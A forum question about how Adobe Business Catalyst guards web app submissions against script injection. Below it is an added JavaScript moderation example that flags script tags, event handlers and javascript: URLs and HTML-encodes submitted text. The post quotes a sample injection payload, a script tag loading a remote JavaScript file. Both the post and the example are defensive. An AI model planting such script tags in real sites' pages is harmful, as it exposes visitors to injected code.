2 Replies Latest reply on Jul 23, 2013 7:39 AM by AndrewKhan

    Web App Submission Security.

    AndrewKhan Level 1

      Hi All,


      Just a quick one, but a worrying one.


      What are Business Catalyst's security measures for web app submissions? I am just building an app allowing one of my client's customers to submit web app items when logged in. And while the submissions are being moderated before being accepted and put online, I do worry for the security. We can do a certain amount to filter what is being submitted client-side, but as we all know it takes very little to disable JavaScript and override that completely.


      The main thing I am worried for is script injection, for example if I posted:


      Hi, I'm Andrew making a fake enquiry that your client will think is okay and happily accept, woo!

      <script type="text/javascript" src="http://www.google.com/naughtyscriptfilecausingbigproblemsformeandmyclientsadface.js" />


      Now clearly having a script file injected into the page is bad, bad news, considering what you could do with that.


      What kind of security measures does Business Catalyst have in place to prevent this? There is nothing we can do client-side.
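
The concern raised in the post above, as an added example that is not part of the original post and is not Business Catalyst code: a moderation-time check that flags active content in a submitted item and HTML-encodes it, so the moderator sees the markup as text instead of having it run. The function names and the pattern list are hypothetical; the patterns are a heuristic to warn the moderator, and the encoding is what makes the content inert.

```javascript
// Added example: handling a submitted web app item on the server or in a
// moderation queue. All names are hypothetical, not a Business Catalyst API.

// Encode the five HTML-significant characters so markup displays as text.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Heuristic patterns for active content. They exist to warn a moderator;
// they are not a complete filter and must not replace output encoding.
const ACTIVE_CONTENT = [
  { name: 'script element', re: /<\s*script\b/i },
  { name: 'embedding element', re: /<\s*(iframe|object|embed)\b/i },
  { name: 'inline event handler', re: /<[^>]*\son\w+\s*=/i },
  { name: 'javascript: URL', re: /javascript\s*:/i },
];

// Returns what a moderator needs: whether the item looks active, why,
// and an encoded copy that is safe to place in an HTML page.
function reviewSubmission(raw) {
  const findings = ACTIVE_CONTENT.filter((p) => p.re.test(raw)).map((p) => p.name);
  return {
    flagged: findings.length > 0,
    findings,
    safeHtml: escapeHtml(raw),
  };
}

// Constructed sample input: the submission quoted in the post above.
const sample =
  "Hi, I'm Andrew making a fake enquiry that your client will think is okay and happily accept, woo!\n" +
  '<script type="text/javascript" src="http://www.google.com/naughtyscriptfilecausingbigproblemsformeandmyclientsadface.js" />';

const result = reviewSubmission(sample);
console.log('flagged:', result.flagged, 'findings:', result.findings);
console.log(result.safeHtml);
```
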